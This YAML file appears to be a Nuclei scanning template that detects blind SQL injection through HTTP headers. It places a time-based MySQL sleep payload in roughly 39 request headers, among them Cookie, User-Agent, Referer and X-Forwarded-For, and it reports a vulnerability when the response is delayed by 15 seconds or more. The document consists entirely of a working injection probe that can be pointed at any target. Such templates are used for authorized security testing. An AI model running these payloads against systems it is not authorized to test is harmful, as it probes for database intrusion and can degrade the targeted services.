id: header-based-blind-sqli3

info:
  name: Header Blind SQL Injection
  author: github.com/freelancermijan
  severity: high
  tags: sqli,bsqli,hsqli,bhsqli,dast

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      Accept: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Accept-Charset: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Accept-Datetime: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Accept-Encoding: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Accept-Language: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Authorization: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Cache-Control: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Connection: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Content-Length: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Content-MD5: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Content-Type: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Cookie: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Date: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Expect: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Forwarded: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      From: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      If-Match: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      If-Modified-Since: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      If-None-Match: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      If-Range: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      If-Unmodified-Since: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Max-Forwards: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Origin: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Pragma: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Proxy-Authorization: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Range: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Referer: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      TE: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Upgrade: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      User-Agent: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Via: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      Warning: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Client-IP: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Remote-IP: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Remote-Addr: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Forwarded-For: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Originating-IP: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Host: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"
      X-Forwarded-Host: "'XOR(if((select now()=sysdate()),sleep(15),0))XOR'Z"

    matchers:
      - type: dsl
        dsl:
          - "duration>=15"
